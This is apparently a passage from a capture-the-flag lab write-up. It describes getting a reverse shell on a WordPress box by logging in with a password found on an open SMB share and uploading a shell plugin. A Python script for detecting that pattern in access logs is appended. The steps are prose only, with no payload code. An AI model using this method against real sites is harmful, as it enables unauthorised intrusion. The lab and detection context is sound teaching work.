Exploitation
After trying to find any vulnerable services, I tried to find some sort of WordPress, WebDAV, or phpMyAdmin to get a shell.
Unfortunately, I was unable to find anything until I tried a directory with the name of the box.
The directory /shenzi/ led me to a WordPress site, where the only thing I had to do was type wp-login.php with the password that I got from the NULL SMB share.
All I needed to do was follow the steps from the Sandbox network from the OSCP labs and I would get a reverse shell.
We generate a reverse shell using this GitHub repo.
All we have to do is upload the zip file, install it as a plugin, and navigate to it, and we will get a reverse shell.
Navigate to the file.
Andddd RCE.
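
From the defender's side, the plugin upload and the request to the new plugin file described above leave a recognizable pair of entries in the web server's access log. The following is an added example, not part of the original writeup: it flags a client that uploads a plugin and then requests a PHP file in a plugin directory not seen earlier in the log. The log lines, IP addresses, plugin names and the 15-minute window are constructed assumptions.

```python
import re
from datetime import datetime

# Constructed sample access-log lines (Apache combined style); IPs and plugin names are made up.
SAMPLE_LOG = """\
192.0.2.10 - - [01/Jan/2024:10:00:01 +0000] "GET /shenzi/wp-content/plugins/akismet/akismet.php HTTP/1.1" 200 0
192.0.2.50 - - [01/Jan/2024:10:05:00 +0000] "POST /shenzi/wp-login.php HTTP/1.1" 302 0
192.0.2.50 - - [01/Jan/2024:10:05:30 +0000] "POST /shenzi/wp-admin/update.php?action=upload-plugin HTTP/1.1" 200 5120
192.0.2.50 - - [01/Jan/2024:10:06:10 +0000] "GET /shenzi/wp-content/plugins/example-plugin/example.php HTTP/1.1" 200 0
192.0.2.10 - - [01/Jan/2024:10:07:00 +0000] "GET /shenzi/wp-content/plugins/akismet/akismet.php HTTP/1.1" 200 0
"""

LINE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) ')
PLUGIN_PHP = re.compile(r'/wp-content/plugins/([^/]+)/[^?]*\.php(?:\?|$)')

def find_plugin_upload_then_exec(log_text, window_s=900):
    """Return hits on a previously unseen plugin directory made by a client
    within window_s seconds of that client's WordPress plugin upload."""
    seen_slugs = set()   # plugin directories already requested earlier in the log
    uploads = {}         # client IP -> time of its most recent plugin upload
    findings = []
    for raw in log_text.splitlines():
        m = LINE.match(raw)
        if not m:
            continue     # skip lines that are not in the expected format
        ip, ts, method, path, _status = m.groups()
        when = datetime.strptime(ts, "%d/%b/%Y:%H:%M:%S %z")
        # WordPress handles "Upload Plugin" through wp-admin/update.php
        if method == "POST" and "/wp-admin/update.php" in path and "action=upload-plugin" in path:
            uploads[ip] = when
            continue
        p = PLUGIN_PHP.search(path)
        if not p:
            continue
        slug = p.group(1)
        up = uploads.get(ip)
        if up and slug not in seen_slugs and 0 <= (when - up).total_seconds() <= window_s:
            findings.append({"ip": ip, "plugin": slug, "path": path,
                             "upload": up.isoformat(), "hit": when.isoformat()})
        seen_slugs.add(slug)
    return findings

if __name__ == "__main__":
    for f in find_plugin_upload_then_exec(SAMPLE_LOG):
        print(f)
```

Legitimate administrators also install plugins, so a finding is a lead to check against change records rather than proof of compromise.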